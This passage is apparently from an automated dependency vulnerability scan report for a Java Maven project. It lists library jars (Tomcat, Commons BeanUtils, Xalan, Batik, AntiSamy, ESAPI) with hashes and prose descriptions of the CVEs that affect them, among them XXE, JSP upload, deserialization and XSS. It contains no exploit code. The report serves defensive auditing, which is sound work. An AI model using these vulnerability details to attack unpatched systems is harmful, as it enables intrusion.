CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 does not place org.apache.catalina.manager.StatusManagerServlet on the org/apache/catalina/core/RestrictedServlets.properties list, which allows remote authenticated users to bypass intended SecurityManager restrictions and read arbitrary HTTP requests, and consequently discover session ID values, via a crafted web application.

Vulnerable Software & Versions:

CVE-2016-0714  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The session-persistence implementation in Apache Tomcat 6.x before 6.0.45, 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M2 mishandles session attributes, which allows remote authenticated users to bypass intended SecurityManager restrictions and execute arbitrary code in a privileged context via a web application that places a crafted object in a session.

Vulnerable Software & Versions:

CVE-2016-0762  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Realm implementations in Apache Tomcat versions 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not process the supplied password if the supplied user name did not exist. This made a timing attack possible to determine valid user names. Note that the default configuration includes the LockOutRealm which makes exploitation of this vulnerability harder.

Vulnerable Software & Versions:

CVE-2016-0763  

Severity:Medium
CVSS Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The setGlobalContext method in org/apache/naming/factory/ResourceLinkFactory.java in Apache Tomcat 7.x before 7.0.68, 8.x before 8.0.31, and 9.x before 9.0.0.M3 does not consider whether ResourceLinkFactory.setGlobalContext callers are authorized, which allows remote authenticated users to bypass intended SecurityManager restrictions and read or write to arbitrary application data, or cause a denial of service (application disruption), via a web application that sets a crafted global context.

Vulnerable Software & Versions:

CVE-2016-3092  

Severity:High
CVSS Score: 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C)
CWE: CWE-20 Improper Input Validation

The MultipartStream class in Apache Commons Fileupload before 1.3.2, as used in Apache Tomcat 7.x before 7.0.70, 8.x before 8.0.36, 8.5.x before 8.5.3, and 9.x before 9.0.0.M7 and other products, allows remote attackers to cause a denial of service (CPU consumption) via a long boundary string.

Vulnerable Software & Versions:

CVE-2016-5018  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 a malicious web application was able to bypass a configured SecurityManager via a Tomcat utility method that was accessible to web applications.

Vulnerable Software & Versions:

CVE-2016-5388  

Severity:Medium
CVSS Score: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Apache Tomcat 7.x through 7.0.70 and 8.x through 8.5.4, when the CGI Servlet is enabled, follows RFC 3875 section 4.1.18 and therefore does not protect applications from the presence of untrusted client data in the HTTP_PROXY environment variable, which might allow remote attackers to redirect an application's outbound HTTP traffic to an arbitrary proxy server via a crafted Proxy header in an HTTP request, aka an "httpoxy" issue. NOTE: the vendor states "A mitigation is planned for future releases of Tomcat, tracked as CVE-2016-5388"; in other words, this is not a CVE ID for a vulnerability.

Vulnerable Software & Versions:

CVE-2016-5425  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Tomcat package on Red Hat Enterprise Linux (RHEL) 7, Fedora, CentOS, Oracle Linux, and possibly other Linux distributions uses weak permissions for /usr/lib/tmpfiles.d/tomcat.conf, which allows local users to gain root privileges by leveraging membership in the tomcat group.

Vulnerable Software & Versions:

CVE-2016-6325  

Severity:High
CVSS Score: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The Tomcat package on Red Hat Enterprise Linux (RHEL) 5 through 7, JBoss Web Server 3.0, and JBoss EWS 2 uses weak permissions for (1) /etc/sysconfig/tomcat and (2) /etc/tomcat/tomcat.conf, which allows local users to gain privileges by leveraging membership in the tomcat group.

Vulnerable Software & Versions:

CVE-2016-6794  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When a SecurityManager is configured, a web application's ability to read system properties should be controlled by the SecurityManager. In Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70, 6.0.0 to 6.0.45 the system property replacement feature for configuration files could be used by a malicious web application to bypass the SecurityManager and read system properties that should not be visible.

Vulnerable Software & Versions:

CVE-2016-6796  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

A malicious web application running on Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 was able to bypass a configured SecurityManager via manipulation of the configuration parameters for the JSP Servlet.

Vulnerable Software & Versions:

CVE-2016-6797  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-284 Improper Access Control

The ResourceLinkFactory implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M9, 8.5.0 to 8.5.4, 8.0.0.RC1 to 8.0.36, 7.0.0 to 7.0.70 and 6.0.0 to 6.0.45 did not limit web application access to global JNDI resources to those resources explicitly linked to the web application. Therefore, it was possible for a web application to access any global JNDI resource whether an explicit ResourceLink had been configured or not.

Vulnerable Software & Versions:

CVE-2016-6816  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

The code in Apache Tomcat 9.0.0.M1 to 9.0.0.M11, 8.5.0 to 8.5.6, 8.0.0.RC1 to 8.0.38, 7.0.0 to 7.0.72, and 6.0.0 to 6.0.47 that parsed the HTTP request line permitted invalid characters. This could be exploited, in conjunction with a proxy that also permitted the invalid characters but with a different interpretation, to inject data into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other than their own.

Vulnerable Software & Versions:

CVE-2016-8735  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-284 Improper Access Control

Remote code execution is possible with Apache Tomcat before 6.0.48, 7.x before 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12 if JmxRemoteLifecycleListener is used and an attacker can reach JMX ports. The issue exists because this listener wasn't updated for consistency with the CVE-2016-3427 Oracle patch that affected credential types.

Vulnerable Software & Versions:

CVE-2016-8745  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-388

A bug in the error handling of the send file code for the NIO HTTP connector in Apache Tomcat 9.0.0.M1 to 9.0.0.M13, 8.5.0 to 8.5.8, 8.0.0.RC1 to 8.0.39, 7.0.0 to 7.0.73 and 6.0.16 to 6.0.48 resulted in the current Processor object being added to the Processor cache multiple times. This in turn meant that the same Processor could be used for concurrent requests. Sharing a Processor can result in information leakage between requests including, but not limited to, the session ID and the response body. The bug was first noticed in 8.5.x onwards, where it appears the refactoring of the Connector code for 8.5.x onwards made it more likely that the bug was observed. Initially it was thought that the 8.5.x refactoring introduced the bug, but further investigation has shown that the bug is present in all currently supported Tomcat versions.

Vulnerable Software & Versions:

CVE-2017-12615  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-434 Unrestricted Upload of File with Dangerous Type

When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Vulnerable Software & Versions:

CVE-2017-12616  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

When using a VirtualDirContext with Apache Tomcat 7.0.0 to 7.0.80 it was possible to bypass security constraints and/or view the source code of JSPs for resources served by the VirtualDirContext using a specially crafted request.

Vulnerable Software & Versions:

CVE-2017-12617  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-434 Unrestricted Upload of File with Dangerous Type

When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.

Vulnerable Software & Versions:

CVE-2017-5647  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

A bug in the handling of the pipelined requests in Apache Tomcat 9.0.0.M1 to 9.0.0.M18, 8.5.0 to 8.5.12, 8.0.0.RC1 to 8.0.42, 7.0.0 to 7.0.76, and 6.0.0 to 6.0.52, when send file was used, results in the pipelined request being lost when send file processing of the previous request completed. This could result in responses appearing to be sent for the wrong request. For example, a user agent that sent requests A, B and C could see the correct response for request A, the response for request C for request B and no response for request C.

Vulnerable Software & Versions:

CVE-2017-5648  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N)
CWE: CWE-284 Improper Access Control

While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.

Vulnerable Software & Versions:

CVE-2017-5664  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-254 7PK - Security Features

The error page mechanism of the Java Servlet Specification requires that, when an error occurs and an error page is configured for the error that occurred, the original request and response are forwarded to the error page. This means that the request is presented to the error page with the original HTTP method. If the error page is a static file, the expected behaviour is to serve the content of the file as if processing a GET request, regardless of the actual HTTP method. The Default Servlet in Apache Tomcat 9.0.0.M1 to 9.0.0.M20, 8.5.0 to 8.5.14, 8.0.0.RC1 to 8.0.43 and 7.0.0 to 7.0.77 did not do this. Depending on the original request this could lead to unexpected and undesirable results for static error pages including, if the DefaultServlet is configured to permit writes, the replacement or removal of the custom error page. Notes for other user provided error pages: (1) Unless explicitly coded otherwise, JSPs ignore the HTTP method. JSPs used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method. (2) By default, the response generated by a Servlet does depend on the HTTP method. Custom Servlets used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method.

Vulnerable Software & Versions:

CVE-2017-6056  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-19 Data Processing Errors

It was discovered that a programming error in the processing of HTTPS requests in the Apache Tomcat servlet and JSP engine may result in denial of service via an infinite loop. The denial of service is easily achievable as a consequence of backporting a CVE-2016-6816 fix but not backporting the fix for Tomcat bug 57544. Distributions affected by this backporting issue include Debian (before 7.0.56-3+deb8u8 and 8.0.14-1+deb8u7 in jessie) and Ubuntu.

Vulnerable Software & Versions:

CVE-2017-7674  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-345 Insufficient Verification of Data Authenticity

The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.

Vulnerable Software & Versions:

CVE-2018-1304  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
CWE: CWE-254 7PK - Security Features

The URL pattern of "" (the empty string) which exactly maps to the context root was not correctly handled in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 when used as part of a security constraint definition. This caused the constraint to be ignored. It was, therefore, possible for unauthorised users to gain access to web application resources that should have been protected. Only security constraints with a URL pattern of the empty string were affected.

Vulnerable Software & Versions:

CVE-2018-1305  

Severity:Medium
CVSS Score: 4.0 (AV:N/AC:L/Au:S/C:P/I:N/A:N)
CWE: CWE-284 Improper Access Control

Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. This could have exposed resources to users who were not authorised to access them.

Vulnerable Software & Versions:

CVE-2018-1336  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')

An improper handling of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.

Vulnerable Software & Versions:

CVE-2018-8014  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-254 7PK - Security Features

The default settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. Therefore, it is expected that most users will not be impacted by this issue.

Vulnerable Software & Versions:

CVE-2018-8034  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-295 Improper Certificate Validation

The host name verification when using TLS with the WebSocket client was missing. It is now enabled by default. Versions Affected: Apache Tomcat 9.0.0.M1 to 9.0.9, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, and 7.0.35 to 7.0.88.

Vulnerable Software & Versions:

commons-beanutils-core-1.7.0.jar

File Path: /Users/Kevin/.m2/repository/commons-beanutils/commons-beanutils-core/1.7.0/commons-beanutils-core-1.7.0.jar
MD5: 458b500e7283d295f69a93ffc4a15293
SHA1: 52f7701e1e9fd1d2b93379503c0bc839d2caf68d
SHA256:dbdac3b81a1c22a1d09b8c4a1c55b00af4767bd068838651c04c2f130172a207
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:commons_beanutils:1.7.0  Confidence:Low  
  • maven: commons-beanutils:commons-beanutils-core:1.7.0  Confidence:Highest

CVE-2014-0114  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-20 Improper Input Validation

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

Vulnerable Software & Versions:

xmlParserAPIs-2.6.2.jar

File Path: /Users/Kevin/.m2/repository/xerces/xmlParserAPIs/2.6.2/xmlParserAPIs-2.6.2.jar
MD5: 2651f9f7c39e3524f3e2c394625ac63a
SHA1: 065acede1e5305bd2b92213d7b5761328c6f4fd9
SHA256:1c2867be1faa73c67e9232631241eb1df4cd0763048646e7bb575a9980e9d7e5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: xerces:xmlParserAPIs:2.6.2  Confidence:Highest

xercesImpl-2.6.2.jar

File Path: /Users/Kevin/.m2/repository/xerces/xercesImpl/2.6.2/xercesImpl-2.6.2.jar
MD5: c4c5a77f9e61f33d80780176451d71c2
SHA1: 897bcb56d6b7fe2070a5f561bfc78968ecdd3851
SHA256:7512957342dc34290f27c0d5fd4313e00acb1e6dbe2992fd4ca66b46d7200035
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: xerces:xercesImpl:2.6.2  Confidence:Highest

xalan-2.7.0.jar

File Path: /Users/Kevin/.m2/repository/xalan/xalan/2.7.0/xalan-2.7.0.jar
MD5: a018d032c21a873225e702b36b171a10
SHA1: a33c0097f1c70b20fa7ded220ea317eb3500515e
SHA256:bf1f065efd6e3d5cb964db4130815752015873338999d23dcafc2dbc89fc7d9b
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2014-0107  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-264 Permissions, Privileges, and Access Controls

The TransformerFactory in Apache Xalan-Java before 2.7.2 does not properly restrict access to certain properties when FEATURE_SECURE_PROCESSING is enabled, which allows remote attackers to bypass expected restrictions and load arbitrary classes or access external resources via a crafted (1) xalan:content-header, (2) xalan:entities, (3) xslt:content-header, or (4) xslt:entities property, or a Java property that is bound to the XSLT 1.0 system-property function.

Vulnerable Software & Versions:

xom-1.1.jar

File Path: /Users/Kevin/.m2/repository/xom/xom/1.1/xom-1.1.jar
MD5: 6b5e76db86d7ae32a451ffdb6fce0764
SHA1: 6705564269d976dbc0d869b58aca25290c0eb4cb
SHA256:05d513cce3f19c1bc4b06c545431da10dbd2f96b4e83aa715d2fe92b06d951a7
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: xom:xom:1.1  Confidence:Highest

bsh-core-2.0b4.jar

Description:

 BeanShell core

File Path: /Users/Kevin/.m2/repository/org/beanshell/bsh-core/2.0b4/bsh-core-2.0b4.jar
MD5: bab431f0908fde87034f0c34c6cf1e30
SHA1: 495e25a99e29970ffe8ba0b1d551e1d1a9991fc1
SHA256:d7cfeb28b2af7b53ef570dd742b8731ed7f71a938e6e9a73384940f4c818d069
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.beanshell:bsh-core:2.0b4  Confidence:Highest
  • cpe: cpe:/a:beanshell_project:beanshell:2.0.b4  Confidence:Low  

CVE-2016-2510  

Severity:Medium
CVSS Score: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

BeanShell (bsh) before 2.0b6, when included on the classpath by an application that uses Java serialization or XStream, allows remote attackers to execute arbitrary code via crafted serialized data, related to XThis.Handler.

Vulnerable Software & Versions:

batik-ext-1.7.jar

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/xmlgraphics/batik-ext/1.7/batik-ext-1.7.jar
MD5: 080f3a49c658693dfbb4e48b0bfc8f07
SHA1: 4784302b44a0336166fef6153a5e3d73e861aecc
SHA256:de85a6de7cdd36ee9ff28dfe7e03d515be92a702d61028f8928c0cd56f1ee375
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:batik:1.7  Confidence:Highest  
  • maven: org.apache.xmlgraphics:batik-ext:1.7  Confidence:Highest

CVE-2015-0250  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)

XML external entity (XXE) vulnerability in the SVG to (1) PNG and (2) JPG conversion classes in Apache Batik 1.x before 1.8 allows remote attackers to read arbitrary files or cause a denial of service via a crafted SVG file.

Vulnerable Software & Versions:

CVE-2017-5662  

Severity:High
CVSS Score: 7.9 (AV:N/AC:M/Au:S/C:C/I:N/A:C)
CWE: CWE-611 Improper Restriction of XML External Entity Reference ('XXE')

In Apache Batik before 1.9, files lying on the filesystem of the server which uses Batik can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root a full compromise of the server - including confidential or sensitive files - would be possible. XXE can also be used to attack the availability of the server via denial of service, as the references within an XML document can trivially trigger an amplification attack.

Vulnerable Software & Versions:

CVE-2018-8013  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-502 Deserialization of Untrusted Data

In Apache Batik 1.x before 1.10, when deserializing a subclass of `AbstractDocument`, the class takes a string from the input stream as the class name and then uses it to call the no-arg constructor of that class. The fix was to check the class type before calling newInstance during deserialization.

Vulnerable Software & Versions:

xml-apis-ext-1.3.04.jar

Description:

xml-commons provides an Apache-hosted set of DOM, SAX, and JAXP interfaces for use in other xml-based projects. Our hope is that we can standardize on both a common version and packaging scheme for these critical XML standards interfaces to make the lives of both our developers and users easier. The External Components portion of xml-commons contains interfaces that are defined by external standards organizations. For DOM, that's the W3C; for SAX it's David Megginson and sax.sourceforge.net; for JAXP it's Sun.

File Path: /Users/Kevin/.m2/repository/xml-apis/xml-apis-ext/1.3.04/xml-apis-ext-1.3.04.jar
MD5: bcb07d3b8d2397db7a3013b6465d347b
SHA1: 41a8b86b358e87f3f13cf46069721719105aff66
SHA256:d0b4887dc34d57de49074a58affad439a013d0baffa1a8034f8ef2a5ea191646
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: xml-apis:xml-apis-ext:1.3.04  Confidence:Highest

nekohtml-1.9.12.jar

License:

The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/sourceforge/nekohtml/nekohtml/1.9.12/nekohtml-1.9.12.jar
MD5: 0e5bd4ce84fab674dbc0c95c4bd193d0
SHA1: 6b58cfa01218d900a5c5996b82b52cffab981c0a
SHA256:7580bbf927c939ffb81139ec42fec395f7228c1d81ca8757261e119e7876cc80
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.sourceforge.nekohtml:nekohtml:1.9.12  Confidence:Highest

commons-httpclient-3.1.jar

Description:

The HttpClient component supports the client-side of RFC 1945 (HTTP/1.0) and RFC 2616 (HTTP/1.1), several related specifications (RFC 2109 (Cookies), RFC 2617 (HTTP Authentication), etc.), and provides a framework by which new request types (methods) or HTTP extensions can be created easily.

License:

Apache License: http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/commons-httpclient/commons-httpclient/3.1/commons-httpclient-3.1.jar
MD5: 8ad8c9229ef2d59ab9f59f7050e846a5
SHA1: 964cd74171f427720480efdec40a7c7f6e58426a
SHA256:dbd4953d013e10e7c1cc3701a3e6ccd8c950c892f08d804fabfac21705930443
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:httpclient:3.1  Confidence:Low  
  • cpe: cpe:/a:apache:commons-httpclient:3.1  Confidence:Low  
  • maven: commons-httpclient:commons-httpclient:3.1  Confidence:Highest

antisamy-1.4.3.jar

File Path: /Users/Kevin/.m2/repository/org/owasp/antisamy/antisamy/1.4.3/antisamy-1.4.3.jar
MD5: 9c7777853e159535f4d510b4dc0a88a9
SHA1: 6bac1ebc43ac3db223f592ce904ac4c2f3ef26e5
SHA256:a1e7e3cf60798f4b6024d68dec65baa52ec7ad09cff136c4d675a54c408db618
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2016-10006  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

In OWASP AntiSamy before 1.5.5, by submitting a specially crafted input (a tag that supports style with active content), you could bypass the library protections and supply executable code. The impact is XSS.

Vulnerable Software & Versions:

CVE-2017-14735  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

OWASP AntiSamy before 1.5.7 allows XSS via HTML5 entities, as demonstrated by use of &colon; to construct a javascript: URL.

Vulnerable Software & Versions:

CVE-2018-1000643  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

OWASP AntiSamy version 1.5.7 and earlier contains a Cross Site Scripting (XSS) vulnerability in AntiSamy.scan() - for both SAX & DOM - that can result in Cross Site Scripting.

Vulnerable Software & Versions:

esapi-2.0.1.jar

Description:

The Enterprise Security API (ESAPI) project is an OWASP project to create simple strong security controls for every web platform. Security controls are not simple to build. You can read about the hundreds of pitfalls for unwary developers on the OWASP website. By providing developers with a set of strong controls, we aim to eliminate some of the complexity of creating secure web applications. This can result in significant cost savings across the SDLC.

License:

BSD: http://www.opensource.org/licenses/bsd-license.php
Creative Commons 3.0 BY-SA: http://creativecommons.org/licenses/by-sa/3.0/
File Path: /Users/Kevin/.m2/repository/org/owasp/esapi/esapi/2.0.1/esapi-2.0.1.jar
MD5: 90c61b27a98c1e0940381b47efe93852
SHA1: 2ea3b87c948dbc0c77a17fe24fda961ecc38c6f2
SHA256: 337ce7afc69ebed3851ba512060615e77ad488252cab210803b1e129da506302
Referenced In Project/Scope:trial:compile

Identifiers

CVE-2013-5679  

Severity:Low
CVSS Score: 2.6 (AV:L/AC:H/Au:N/C:P/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The authenticated-encryption feature in the symmetric-encryption implementation in the OWASP Enterprise Security API (ESAPI) for Java 2.x before 2.1.0 does not properly resist tampering with serialized ciphertext, which makes it easier for remote attackers to bypass intended cryptographic protection mechanisms via an attack against authenticity in the default configuration, involving a null MAC and a zero MAC length.

Vulnerable Software & Versions:

CVE-2013-5960  

Severity:Medium
CVSS Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
CWE: CWE-310 Cryptographic Issues

The authenticated-encryption feature in the symmetric-encryption implementation in the OWASP Enterprise Security API (ESAPI) for Java 2.x before 2.1.0.1 does not properly resist tampering with serialized ciphertext, which makes it easier for remote attackers to bypass intended cryptographic protection mechanisms via an attack against the intended cipher mode in a non-default configuration, a different vulnerability than CVE-2013-5679.

Vulnerable Software & Versions:

tomcat-coyote-7.0.0.jar

Description:

Tomcat Connectors and HTTP parser

File Path: /Users/Kevin/.m2/repository/org/apache/tomcat/tomcat-coyote/7.0.0/tomcat-coyote-7.0.0.jar
MD5: cd8fcb87a3eb0bd7dec0d1b26722e9e9
SHA1: fb07ea462132c8df498254b1ee4af0c2795251fb
SHA256: 6aa5878498e9da136dd3f8b83a1887b9926f886cbc7ef9237526bf80a23f27da
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache:coyote_http_connector:7.0.0  Confidence:Low  
  • cpe: cpe:/a:apache:tomcat_connectors:7.0.0  Confidence:Low  
  • maven: org.apache.tomcat:tomcat-coyote:7.0.0  Confidence:Highest
  • cpe: cpe:/a:apache_software_foundation:tomcat:7.0.0  Confidence:Low  
  • cpe: cpe:/a:apache_tomcat:apache_tomcat:7.0.0  Confidence:Low  
  • cpe: cpe:/a:apache:tomcat:7.0.0  Confidence:Highest  

CVE-2010-2227  

Severity:Medium
CVSS Score: 6.4 (AV:N/AC:L/Au:N/C:P/I:N/A:P)
CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer

Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."

Vulnerable Software & Versions:

CVE-2010-3718  

Severity:Low
CVSS Score: 1.2 (AV:L/AC:H/Au:N/C:N/I:P/A:N)

Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.

Vulnerable Software & Versions:

CVE-2010-4172  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.

Vulnerable Software & Versions:

CVE-2011-0013  

Severity:Medium
CVSS Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.

Vulnerable Software & Versions:

CVE-2011-0534  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CWE: CWE-399 Resource Management Errors

